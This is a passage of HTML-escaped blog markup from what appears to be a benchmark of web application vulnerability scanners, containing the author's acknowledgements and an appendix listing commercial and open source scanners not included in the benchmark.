security sources such as &lt;b&gt;Security Sh3ll&lt;/b&gt; (&lt;/span&gt;&lt;a href=&quot;http://security-sh3ll.blogspot.com/&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;http://security-sh3ll.blogspot.com/&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;), &lt;b&gt;PenTestIT&lt;/b&gt; (&lt;/span&gt;&lt;a href=&quot;http://www.pentestit.com/&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;http://www.pentestit.com/&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;), &lt;b&gt;The Hacker News (&lt;/b&gt;&lt;/span&gt;&lt;a href=&quot;http://thehackernews.com/&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;http://thehackernews.com/&lt;/span&gt;&lt;/a&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;), Toolswatch (&lt;/span&gt;&lt;/b&gt;&lt;a href=&quot;http://www.vulnerabilitydatabase.com/toolswatch/&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;http://www.vulnerabilitydatabase.com/toolswatch/&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;), &lt;b&gt;Darknet&lt;/b&gt; (&lt;/span&gt;&lt;a href=&quot;http://www.darknet.org.uk/&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;http://www.darknet.org.uk/&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;), &lt;b&gt;Packet Storm&lt;/b&gt; (&lt;/span&gt;&lt;a href=&quot;http://packetstormsecurity.org/&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;http://packetstormsecurity.org/&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;), &lt;b&gt;Google&lt;/b&gt; (of course), &lt;b&gt;Twitter&lt;/b&gt; (and the never-ending
list of favorites I keep there) and many others great sources that I have used
over the years to gather the list of tools.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;I can&#39;t thank you all enough, and wish you all the best.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;u&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;27. Appendix A: Tools That Were Not Included&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The following &lt;b&gt;&lt;i&gt;commercial&lt;/i&gt;&lt;/b&gt; web application
vulnerability scanners were &lt;b&gt;&lt;i&gt;not included&lt;/i&gt;&lt;/b&gt;&lt;i&gt; &lt;/i&gt;in the benchmark,
due to deadlines and time restrictions from my part:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Commercial Scanners not included in this benchmark&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;a href=&quot;http://www.websure.fr/en/&quot;&gt;&lt;b&gt;Websure&lt;/b&gt;&lt;/a&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://www.cenzic.com/technology/index.html&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Hailstorm&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; (Cenzic)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://www.mcafee.com/us/products/vulnerability-manager.aspx&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;McAfee Vulnerability Manager&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; &lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(McAfee /
Foundstone)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://www.rapid7.com/products/nexpose-enterprise-edition.jsp&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;NeXpose Enterprise Edition Web Application Scanning Features&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; (Rapid7)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://www.eeye.com/Products/Retina/Web-Security-Scanner.aspx&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Retina Web Application Scanner&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; &lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(eEye
Digital Security)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://www.saintcorporation.com/products/software/saintScanner.html&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;SAINT Scanner&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
Web Application Scanning Features (SAINT co.)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://www.ncircle.com/index.php?s=products_webapp360&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;WebApp360&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(NCircle)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://www.coresecurity.com/content/web-app-pro&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Core Impact Pro Web Application Scanning Features&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; &lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(Core
Impact)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://www.parasoft.com/jsp/products/article.jsp?label=product_info_WebKing&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Parasoft Web Application Scanning Features&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; &lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(a.k.a &lt;b&gt;&lt;i&gt;WebKing,
&lt;/i&gt;&lt;/b&gt;by Parasoft)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://www.dbappsecurity.com/webscan.html&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;MatriXay Web Application Scanner&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; &lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(DBAppSecurity)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://www.buyservers.net/falcove.htm&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Falcove&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(BuyServers ltd, currently
Unmaintained)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://www.safe3.com.cn/en/safe3wvs.htm&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Safe3WVS 13.1 Commercial Edition&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; &lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(Safe3
Network Center) &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The following &lt;b&gt;&lt;i&gt;open source&lt;/i&gt;&lt;/b&gt; web application
vulnerability scanners were &lt;b&gt;&lt;i&gt;not included&lt;/i&gt; &lt;/b&gt;in the benchmark, mainly
due to time restrictions, but might be included in future benchmarks:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Open Source Scanners not included in this benchmark&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://www.blackhatacademy.org/security101/Vanguard&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Vanguard&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://code.google.com/p/webvulscan/&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;WebVulScan&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/sqlsentinel/files/&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;SQLSentinel&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-hansi-theme-font: major-bidi;&quot;&gt;&lt;a href=&quot;https://www.owasp.org/index.php/OWASP_Xelenium_Project&quot;&gt;OWASP
Xelenium&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-hansi-theme-font: major-bidi;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;https://bitbucket.org/gbrindisi/xsssniper&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;XssSniper&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
